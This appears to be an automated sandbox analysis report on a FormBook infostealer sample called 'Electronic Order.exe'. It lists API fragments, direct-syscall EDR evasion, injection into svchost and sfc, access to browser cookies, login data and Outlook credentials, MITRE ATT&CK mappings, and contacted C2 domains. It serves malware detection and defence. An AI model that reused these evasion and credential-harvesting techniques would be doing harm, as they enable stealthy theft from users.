            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035649D0 mov eax, dword ptr fs:[00000030h]2_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA9D3 mov eax, dword ptr fs:[00000030h]2_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C69C0 mov eax, dword ptr fs:[00000030h]2_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035629F9 mov eax, dword ptr fs:[00000030h]2_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE9E0 mov eax, dword ptr fs:[00000030h]2_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov esi, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B89B3 mov eax, dword ptr fs:[00000030h]2_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035429A0 mov eax, dword ptr fs:[00000030h]2_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035309AD mov eax, dword ptr fs:[00000030h]2_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560854 mov eax, dword ptr fs:[00000030h]2_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534859 mov eax, dword ptr fs:[00000030h]2_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03542840 mov ecx, dword ptr fs:[00000030h]2_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE872 mov eax, dword ptr fs:[00000030h]2_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6870 mov eax, dword ptr fs:[00000030h]2_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC810 mov eax, dword ptr fs:[00000030h]2_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov eax, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03552835 mov ecx, dword ptr fs:[00000030h]2_2_03552835
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E181F7
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DEA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DEA395
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DEA364 SetUnhandledExceptionFilter,0_2_00DEA364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Electronic Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\sfc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\sfc.exeThread register set: target process: 2020Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\sfc.exeThread APC queued: target process: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Electronic Order.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BFE008Jump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E18C93 LogonUserW,0_2_00E18C93
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00DC3B4C
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DC4A35
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E24EF5 mouse_event,0_2_00E24EF5
            Source: C:\Users\user\Desktop\Electronic Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Electronic Order.exe"Jump to behavior
            Source: C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E181F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00E181F7
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E24C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00E24C03
            Source: Electronic Order.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: BSPmWtBGjJwku.exe, 00000005.00000002.3958574510.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000000.2309025815.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958774348.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: Electronic Order.exe, BSPmWtBGjJwku.exe, 00000005.00000002.3958574510.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000000.2309025815.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958774348.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: BSPmWtBGjJwku.exe, 00000005.00000002.3958574510.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000000.2309025815.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958774348.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: BSPmWtBGjJwku.exe, 00000005.00000002.3958574510.0000000000FC1000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000005.00000000.2309025815.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp, BSPmWtBGjJwku.exe, 00000009.00000002.3958774348.0000000001271000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DE886B cpuid 0_2_00DE886B
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00DF50D7
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E02230 GetUserNameW,0_2_00E02230
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DF418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00DF418A
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00DC4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DC4AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Electronic Order.exeBinary or memory string: WIN_81
            Source: Electronic Order.exeBinary or memory string: WIN_XP
            Source: Electronic Order.exeBinary or memory string: WIN_XPe
            Source: Electronic Order.exeBinary or memory string: WIN_VISTA
            Source: Electronic Order.exeBinary or memory string: WIN_7
            Source: Electronic Order.exeBinary or memory string: WIN_8
            Source: Electronic Order.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3957129608.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389265465.0000000003360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957402787.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2388904508.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3957321346.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2389687780.0000000004600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3958904218.0000000003050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00E36596
            Source: C:\Users\user\Desktop\Electronic Order.exeCode function: 0_2_00E36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00E36A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1471496 Sample: Electronic Order.exe Startdate: 11/07/2024 Architecture: WINDOWS Score: 100 28 www.u9games.xyz 2->28 30 www.j51a.xyz 2->30 32 10 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 7 other signatures 2->50 10 Electronic Order.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 BSPmWtBGjJwku.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 sfc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 BSPmWtBGjJwku.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 huayang.302.gn301.xyz 154.222.238.52, 49749, 49750, 49751 VPSQUANUS Seychelles 22->34 36 www.dtalusering.com 103.42.108.46, 49721, 49722, 49723 SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU Australia 22->36 38 6 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

